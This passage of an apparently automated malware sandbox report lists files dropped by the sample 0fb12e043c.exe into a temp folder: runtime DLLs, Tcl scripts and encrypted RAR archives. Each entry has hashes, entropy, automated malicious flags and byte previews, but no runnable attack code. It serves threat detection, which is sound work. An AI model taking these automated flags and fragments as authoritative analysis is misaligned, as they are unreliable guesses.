                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(<.hFo.hFo.hFo..+o.hFo..=o.hFo.:.o.hFo9'.o.hFo.:.o.hFo.:.o.hFo..=o.hFo.hGo.hFo.:.o.hFo.:.o.hFo.:.o.hFo.:.o.hFoRich.hFo................PE..L...X`1G...........!.....:..........rG.......P.....x.........................0............@.................................L................................ .......R...............................S..@............P..,............R..H............text....8.......:.................. ..`.rdata..^....P.......>..............@..@.data...............................@....rsrc...............................@..@.reloc..n.... ......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90u.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):59904
                                                                                                                                                                                                                                                    Entropy (8bit):6.048382351359956
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:Q2q4fSp3W9sHSIeXNKIv3dJcZqXIq9BVO5nOC6u58rrYlyQRvVFtTiO1lqNkdZ:9TqpwsH1eTJWZv6FrrsNFtmO1oNk
                                                                                                                                                                                                                                                    MD5:371226B8346F29011137C7AA9E93F2F6
                                                                                                                                                                                                                                                    SHA1:485DE5A0CA0564C12EACC38D1B39F5EF5670A2E2
                                                                                                                                                                                                                                                    SHA-256:5B08FE55E4BBF2FBFD405E2477E023137CFCEB4D115650A5668269C03300A8F8
                                                                                                                                                                                                                                                    SHA-512:119A5E16E3A3F2FF0B5ACB6B5D5777997102A3CAE00D48C0F8921DF5818F5FBDA036974E23C6F77A6B9380C6A1065372E70F8D4E665DFD37E5F90EB27DB7420C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(<.hFo.hFo.hFo..+o.hFo..=o.hFo.:.o.hFo9'.o.hFo.:.o.hFo.:.o.hFo..=o.hFo.hGo.hFo.:.o.hFo.:.o.hFo.:.o.hFo.:.o.hFoRich.hFo................PE..L...Y`1G...........!.....:..........rG.......P.....x.........................0......Ko....@.................................|................................ .......R...............................T..@............P..,............R..H............text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...P...........................@....rsrc...............................@..@.reloc..n.... ......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\32098675419873205610

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):31122494
                                                                                                                                                                                                                                                    Entropy (8bit):7.999993988958585
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:786432:TR6qYuhnA26NTYvfZiUX6YPkbHB7CQQsGsiamfBHiI:fYuhnL6l6fZYYPuHUsiauL
                                                                                                                                                                                                                                                    MD5:AFB81FCDFD24C61AB96D41260B4E8B25
                                                                                                                                                                                                                                                    SHA1:F35F56E6D929D9EDEA303E230EA5DF65FFBCDD76
                                                                                                                                                                                                                                                    SHA-256:312A2175614EE8C7149CB90E97F3DD724F48D2F35ABBD7CEDB5FF3228F180F8C
                                                                                                                                                                                                                                                    SHA-512:D5807D9B41114BBD3E0A5DC267CE95FD66ABB591577B6B761C69539E858933902646703B4D5C727B5AB07788C16A2BD3C208709202109568D20942EFF073D31B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:Rar!....%.. !......g)?..N..9..V..u.U.;4(....S.1h..E9~.E.|$d}+?S.lx.P%.....f..y.e..*.Q..O..[L...Zv..\. .s,.>k.u..d?.,..pn91..R..t9...!..3..?.>..v.r..:.....dZ/[~..:&&...u..#...nx.....V..Um.B..Z.(}o.....H.#..=.#C.......DR...p.l.x..f.....V.R2.n....56jW.g..R.f..Q.8..[a8(..{.g..b>....=&.lC6......Y.I...>....p......J0...].."...g7..k..Y.*.....m..:&....B{.1X!L...>.`..4.y.......9......K....1.7...)i...M....Y.~.....;.!A...s...M..x&>..x^;...c...tj..I...O.b.66.u4i..?.v .X....P..n#...f%...]..x>...a......}...../..r....*.....r\l.=.s..."C)...`..."..'O.....y.....^]..*.......@..z^m._.J.H..W.A..;'x>...18.h>..R.....d.5K.i.8.}$...&.o.s.. ..U.^*/..#..D.Ep...&...D.....V.G...`P[+.{5t.T..1$b..,......p.....N.(..&.i....U....|9+.G..NzX{...pb..PA......b..H...?5..*<..._......m...r.X2y..[t......o..2./.4......\...W.o!.jkO..;..\.,..!x._.V@......3[p.........l)r(.O....`...I6.....^...h.a.y.V.4b...T.q.......+..Q.7...{YRc. b.P..IaT~.....H>....8...{.-o..1>..n.{.J?......YGG$.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\41678903251236549780

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):598064
                                                                                                                                                                                                                                                    Entropy (8bit):6.504706526380269
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:LiGn9go3BzQAq/ems1ku07m+ePwrwo+9Ct6:LiGn9go2Aq/bsUvKno+9CY
                                                                                                                                                                                                                                                    MD5:A7742C996FFDA7754142730220432485
                                                                                                                                                                                                                                                    SHA1:3401BECB24617F98C18B9176D12220F4D7C945C9
                                                                                                                                                                                                                                                    SHA-256:C915CDD250FF25970BA041A5DADFC93E8AE9629C6415B88A92718F1EAE9E9666
                                                                                                                                                                                                                                                    SHA-512:461935115A59ACCE074A686F3DEADBBF02A92844A57F55E20A532C77AA788B116A930A2F6100758ABD9BB3919AD15C18D498DCEAEE341CBCDDB98BB3922C7FAA
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.s...s...s..j.G..s..j.E.]s..j.D..s..@.q..s...-...s...-...s...-...s....%..s...s..ps..I-...s..L-I..s..I-...s..Rich.s..................PE..L...}~.^.........."...... ...................0....@..................................%....@.................................<...x.......................00......H9..P...T...............................@............0...............................text...?........ .................. ..`.rdata.......0.......$..............@..@.data............*..................@....tls................................@....rsrc...............................@..@.reloc..H9.......:..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\46197283504128096357

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4280238
                                                                                                                                                                                                                                                    Entropy (8bit):7.999956411806543
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:98304:wdUomal6LwHL3RF/j0JdmUPeuN/Jy3i00PUhUASll:GEaMsDRF/gJcU//r00PFASll
                                                                                                                                                                                                                                                    MD5:40862E5AA291E198DBEACACC25F903BA
                                                                                                                                                                                                                                                    SHA1:3D7C4E5D51782A7BC8EBEC4A9EB43BC9940CD87E
                                                                                                                                                                                                                                                    SHA-256:F4067E3831245E5489A328CA568E8C40DFA066D3BDA4DCB08DD684A1070A703C
                                                                                                                                                                                                                                                    SHA-512:A5E15FD5814DA8A3E6566DC5DDC57A4929B4A848F82BD517681E7833C5D3B49C6D894CEC3467DAD085FF582B989A988A6153B761C8FD2A71C21D44AECB603C03
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:Rar!....%.. !......g)?..N..9..V..u.U.;4(....8....D.:..0+/.Ym3.X..?.l.y.w.x.t.."QHAV..';.p.7.(.3...N..R..PRC...l.,\c8..(1...&;.^seX.3.R....d.&....'S^._T......k&#..c\c.h... y...O.....rs.u.4Y.m..*0u....|o|.5.u........m+...tq.ot...3..j.?....p?,x...n.m..1........Y.U.m...Pn./y.#......s...4.....<..}E...\D.q..1.....h2..B....[..aa...L.Y..]S"'..J`.1|>..~.r...p..XR...Ve1.j*.7`|9%..|7%5l?.g....Z.F]1............9....i.)/....1.O..l..x..`......X.K.p..L~..f.A..j.`BT...{.a...J..HWa.P.D.'.e....b.".(f.ya...1....Ao...^.'.....9..5.X..b..A.*...M(..^I.}..6.....Q..4..G..T...qW.s........../:a. .{:...,.....gX.y.>B..yz....%.=..}....zc......v.4C..Axz.S......j...6*....g.8.SA.4U\.S?-..F.\A.`....X..%!.0..peq..l.)B<...y.{a<_.Jr'..?..@.H..}....X.:./\..-q..l....7..74V.{...*.*FK..EM'.#..G.8b.).v...!4C....#..X....1..l.....'I....\..E..A-.oa..$.R...`.F#..0~.aP..H.lO..uJ$..@....m.Fc[.YV....\...Q...}..o.L..O.}.^..sA...Kb$..E^;L.w.h...f..^q....L.y.V.2s..n..-}(......o.%G.`.Yc...5..j.J'..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\75204139856203418759

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5463566
                                                                                                                                                                                                                                                    Entropy (8bit):7.9999672374912025
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:98304:tDYXUdsKFJiviwRhoet7DqVRn4BQS6Nvp9NnW0BErIJVh+BGk0kTXUd96XOBdFG:IUy+0bcet7ev6QxNvpq0ErIPh+BGk0k5
                                                                                                                                                                                                                                                    MD5:D9D57E793D57FA58426AF55167CAEE05
                                                                                                                                                                                                                                                    SHA1:6DFB65AC0FBD2B7FD936F301A0131838CC684460
                                                                                                                                                                                                                                                    SHA-256:45C089F60704B3FE1AD7557180EDCA357013F4FDC4806A31CE51CF5E173ADE32
                                                                                                                                                                                                                                                    SHA-512:2D10FBA389B86EA27216C16F7F84CCE0B9389368AEC8F279602D260CAEDA5A877435D16EAFC4386B0F8CBA6583F80FD0358F5251234F65E9215015DB3F68F401
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:Rar!........!.....V.N=..d..@.i...J..%M....[=$...Bk#.P....^....H....?..a.sf..Z..e...y..4.n....|("..E.j"o.a.....D.].Q....m.....H.7....u.-..3...~.....n6`..W..,7%f...ur..g.%2..qWh.]}.snQ.n&.j..,.Zj..j$..G.... `..y....P...O=.(@....*.O..f.aJ.G.................=CgUAu....#.........&....`=B.X.......6p}~w..w..m...V!...L.F..E..q.l.pw&..w.G._9P.q.-....[}..GOlv3N.V.NtO..&u.n#.y\l.).P..}........a....X.....O~t...:....l.V.&I..Sqb&.0&.u.......m...+.-...{.B.AR.....(..,N."\..Z.....3.O.@l.... ..|D7.E{=..<(....._oH.k.PD6...Pr.W..\. YvKv.....y.H,....{..*vH......iG.b..r+..O...>.......[....... ..?.j.5....*K.....a.E..K1.v..lL.:, ...;.%I[......f3.]...Ci.j..,.Z.....b.....j...s...J...p../....XQ...sXd.._..."..kQ.Hj....h.z...EB. :.ZoK."O.JU..R.\.@./.h.R.R(\.,$....|...lh.RW......I.9.....D..6....Ms..\?...S.. ..T..I.+.... Wg..l..f.q].;9Ke...a..d.R..Z.=..Jo....s......w..H....wI.0.....o.P.B.....7..8..s.A.</.6..!.PZ......z.k.'g....F..I.wx...!Q...@B(.........}.'

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\msvcm90.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):225280
                                                                                                                                                                                                                                                    Entropy (8bit):6.036101465527911
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:Yk3eocziNzMLSMOYscmnWCAXm00LRk86Goao1IJU87/amFYw8fF01OyA9LX:v6OMqcEJAXb0LRn6fa3/amiX2Oy0
                                                                                                                                                                                                                                                    MD5:7200DCA324F3D1ECD11B2B1250B2D6C7
                                                                                                                                                                                                                                                    SHA1:DF3219CFBC6F6EE6EF025B320563A195BE46D803
                                                                                                                                                                                                                                                    SHA-256:636E12FEA8C47EA528DBA48827AC51A2E98B2EF0864854C9375B8170555C0A6E
                                                                                                                                                                                                                                                    SHA-512:DAC1154FC4E55F9E78C39FCD9FA28B1ABE36D67D9C71660BD58990A1F3864ACEAD7D1C7F55E390F3875B20685B447C3C494B3634F0DC4C7EF3B1E7A17115EB4B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;...h...h...h..ah...h1.dh...h..gh...h...h...h.-.h...h...h...h..qh...h..vh...h..`h...h..fh...h..ch...hRich...h........................PE..L...b.L...........!.....:..........Z........P....?x.........................0......|w....@......................... 3..4....&..d...............................d...P...............................H...@...............(...........p...H............text...T9.......:.................. ..`.data........P.......>..............@....rsrc................H..............@..@.reloc...#.......$...L..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\msvcp90.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):569680
                                                                                                                                                                                                                                                    Entropy (8bit):6.52221622647759
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:fCFE340h3e34GVZQACkIrYhUgiW6QR7t5183Ooc8SHkC2eHgAfl:fCh0h3e3vgzrA83Ooc8SHkC2eHgAfl
                                                                                                                                                                                                                                                    MD5:DB001FAEA818AE2E14A74E0ADC530FC0
                                                                                                                                                                                                                                                    SHA1:7DB49C1A611B38A4F494B1DB23087C751FAA3DE1
                                                                                                                                                                                                                                                    SHA-256:45CB405589C92BF74C47B7C90E299A5732A99403C51F301A5B60579CAF3116E7
                                                                                                                                                                                                                                                    SHA-512:90B8B52E797A43488D21AC9FC73C693B1337ABF46801BD5957C2AECCBA2A50550C54E6842D2CB26035B7F0C706C950C2F6AC99EB4DDD6E433B156BFDB2DF62E1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#%..Mv..Mv..Mv.66v..Mv...v..Mv..Lv:.Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..MvRich..Mv........................PE..L...\.L...........!.....4...p..............P....Hx......................................@..........................P..,....E..<.......................P.......D3...................................%..@............................................text....2.......4.................. ..`.data...t'...P.......8..............@....rsrc................R..............@..@.reloc..HC.......D...V..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):653136
                                                                                                                                                                                                                                                    Entropy (8bit):6.883567262143348
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:Zhr4UCe8uLQrIYE8EdPz1n0/WGipK5d7AO7QlxxdmRyy1:981FYPz8WGip0d7AhpdmRyy1
                                                                                                                                                                                                                                                    MD5:B3892E6DA8E2C8CE4B0A9D3EB9A185E5
                                                                                                                                                                                                                                                    SHA1:E81C5908187D359EEDB6304184E761EFB38D6634
                                                                                                                                                                                                                                                    SHA-256:AE163388201EF2F119E11265586E7DA32C6E5B348E0CC32E3F72E21EBFD0843B
                                                                                                                                                                                                                                                    SHA-512:22E01E25BF97A0169049755246773CFC26162AF28248B27BF4B3DAAF3E89A853738064A2B42C0FEDB9BEDCB3DDAF3AE957A960E2AAB29784CBA312ED9E1C9285
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L...W.L...........!.....\..........@-.......p....Rx.........................0......*.....@..............................|..0...(.......................P........3......................................@............................................text...T[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\python27.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2650112
                                                                                                                                                                                                                                                    Entropy (8bit):6.72219915141047
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:ld0krhjbVYU9U/ElyrLKlvGBO58GBjG9nYM6JBe4PjnhMsQHNClhIdYTf2O+yX3T:QkrRyylvGB65YNCMghMtHIledkp+h
                                                                                                                                                                                                                                                    MD5:9E9E57B47F4F840DDDC938DB54841D86
                                                                                                                                                                                                                                                    SHA1:1ED0BE9C0DADCF602136C81097DA6FDA9E07DBBC
                                                                                                                                                                                                                                                    SHA-256:608FEAFC63A0D1B38772E275C9E6D3B8A5B03EFC0A27EB397107DB0A6D079C50
                                                                                                                                                                                                                                                    SHA-512:1A0DAB38EBF4D995BCDA3BDF0453C85D524CC1FFF1C1B92160794D7C2F98F53088BA15C4B00B35D06E0BE82A4BFA6D92CD4F09DEC4EC98D615A82D5FFD5CB6C2
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bu....{...{...{..[...{..l...{..l....{..l....{..l...{...z.<.{..l..{..l...{..l...{..l...{.Rich..{.................PE..L...x..^...........!.........................................................).....\g)...@..........................g!..|...Q!.x....@(.D....................P(.P\.. ................................O!.@............................................text...z........................... ..`.rdata...D.......F..................@..@.data...pC....!..(....!.............@....rsrc...D....@(.......&.............@..@.reloc..~f...P(..h....'.............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\pythoncom27.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):397824
                                                                                                                                                                                                                                                    Entropy (8bit):6.64988291161832
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:b2y6i0rjBcPEFlmKP/+HHn0T6eXUlw965sOKVbpd675XOeKk:Sy6i0rjByE/mKP/+0dUGpdJy
                                                                                                                                                                                                                                                    MD5:BAFE1A2DB7031DD88803341887712CC5
                                                                                                                                                                                                                                                    SHA1:39DAA19FC8C0B4301EDB0C9FD3C3BC8ABFEA147F
                                                                                                                                                                                                                                                    SHA-256:074F23F9710BBCF1447763829C0E3D16AFA5502EFC6F784077CF334F28CEFFB7
                                                                                                                                                                                                                                                    SHA-512:98395582C72E406254ADE6A3B06CDDECDCE3B38A3A03AA9EB0BB6F81D6AC690BEDED7B88C4F2E5787D5AA062913080915E7E49198753CC851E8E4EF55432A9DF
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A. .. .. ...o.. ..r.. ..r.. ..w.D. ..r.. ..w.A. .. ...!..r... ..r.. ..r.. ..Rich. ..........................PE..L....2.^...........!.................h............ .................................................................p...>^........... ..@....................0..dq..................................p...@...............\............................text....~.......................... ..`.rdata..............................@..@.data........p...:...`..............@....rsrc...@.... ......................@..@.reloc..xr...0...t..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\pywintypes27.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):110592
                                                                                                                                                                                                                                                    Entropy (8bit):6.586001156322738
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:aK4f1OtaUsA0iMGhAPNdOcfY9rgGHXY7bi0OouFsXOKRtyEtq1:aLfYtaUsJiMGhAPNdOA/G3Y7bi03uiXo
                                                                                                                                                                                                                                                    MD5:C7D86A10BFCD65E49A109125D4EBC8D9
                                                                                                                                                                                                                                                    SHA1:5B571DC6A703A7235E8919F69C2A7A5005CCD876
                                                                                                                                                                                                                                                    SHA-256:C4DB872FF7D301186516882EA06422AEE29E1C11B44A4D382ADDD5B801207818
                                                                                                                                                                                                                                                    SHA-512:B7563B4D27713EC4308C24A0B15C02FB16E184B98BB73A4616792508F4BA57FE237186595B55E3FA476D6959388EDD8678EA516CE620EE90C909A7B988D8B908
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q~.Y5...5...5....Pz.7...+My.6...+Mo.8.....".4...+M..1.....'.>...5.......+Mh.$...+M~.4...+M}.4...Rich5...........PE..L....j.^...........!..............................z..................................................................D..PJ..T/..........H............................................................*..@............................................text............................... ..`.rdata.............................@..@.data... ............~..............@....rsrc...H...........................@..@.reloc..l...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\select.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                    Entropy (8bit):5.843142645527012
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:qFXJRZobEm7QNw7MPDdqPSU+QErXUnv3XDVR6yiXc1U5O:qFXJnjCAPDdFBQGXoPzV5ku1
                                                                                                                                                                                                                                                    MD5:E6ECFF0D1588FED3A61EDC1A1A5EB9BB
                                                                                                                                                                                                                                                    SHA1:2A3913A69DBDDA8AEFBE1F290753435979791A37
                                                                                                                                                                                                                                                    SHA-256:345969D43B33717415BD5796D5A7B266592DC79A96543714828FF8FC1F249D18
                                                                                                                                                                                                                                                    SHA-512:F59B356833840126F31F70DDB0E7F661DB8528D82AA9450E299B81FE5ADDA35D44F3BCEB52FB27E6843CF497211470F439A232C73245F8C606B31CB13322CD6F
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...z...z...z...z...z...z...z...z...z...z...z...z...z...z...z...z...z...z...zRich...z........PE..L......^...........!.........................0...............................`............@..........................8..H....3..d............................P.......1...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@....... ..............@....reloc.......P.......&..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl85.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):900608
                                                                                                                                                                                                                                                    Entropy (8bit):6.737800356736791
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:rr37G4Tr6sL4rCvwHIo2WEyMz7yYK6ZSmd9saBaAnVw8p:vyxrCvPxzvbs7Ur
                                                                                                                                                                                                                                                    MD5:5D2DBA2F9127BEFE21C516A93C163A49
                                                                                                                                                                                                                                                    SHA1:8EB043FC28ACF5ED3F9B2AFBA78A8BA5CEED84C8
                                                                                                                                                                                                                                                    SHA-256:23DECA371449E94C6C83BD97F369E203E04DABA9986F11113F9C55379B3288B8
                                                                                                                                                                                                                                                    SHA-512:21D1BCD7D9306B9B7D2DCD755952D94A225161AD07FB9AD3A0CE550AC4462E4B215C716AB11700AA7D959463C297318296F4D442951E75E71DDDD1C851897075
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S..............^......]......K......L......[............A......Z......\......Y....Rich...........PE..L....x.]...........!.....0...........4.......@...........................................................................X.....x....P.......................`.....................................@...@............@..l............................text............0.................. ..`.rdata..=....@.......4..............@..@.data....;.......,..................@....rsrc........P.......&..............@..@.reloc..>....`......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\auto.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):20613
                                                                                                                                                                                                                                                    Entropy (8bit):4.703115172401551
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:XpJ4cB1RJtA61Z/kpP9leP9R5Hx396caBXhTEFHIW2ezBIdNnH:P4cB1RJtA61Z8pP/ePv396c+6HIW2ezU
                                                                                                                                                                                                                                                    MD5:A987B2DB697B0EFA13E0B88149C98C40
                                                                                                                                                                                                                                                    SHA1:9AD827E72FE82F46D350BE7368661740EFEBA50E
                                                                                                                                                                                                                                                    SHA-256:F33B4E6CA8AC8A86ACE39AD57628D7588EF04EC3D8D86C700F54CCBA77B242FC
                                                                                                                                                                                                                                                    SHA-512:7AC09C64CC909F12DDCD44E3EE4177F98DF8F4843FAAA6DF7667A4A290EB56122110292F080536E71CE5DF963EFD0CCC9614D0AF902306F843B2C56543882574
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# auto.tcl --.#.# utility procs formerly in init.tcl dealing with auto execution.# of commands and can be auto loaded themselves..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# auto_reset --.#.# Destroy all cached information for auto-loading and auto-execution,.# so that the information gets recomputed the next time it's needed..# Also delete any commands that are listed in the auto-load index..#.# Arguments:.# None...proc auto_reset {} {. global auto_execs auto_index auto_path. if {[array exists auto_index]} {..foreach cmdName [array names auto_index] {.. set fqcn [namespace which $cmdName].. if {$fqcn eq ""} {continue}.. rename $fqcn {}..}. }. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath. if {[catch {llength $auto_path}]} {..set auto_p

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\clock.tcl

                                                                                                                                                                                                                                                    Download File
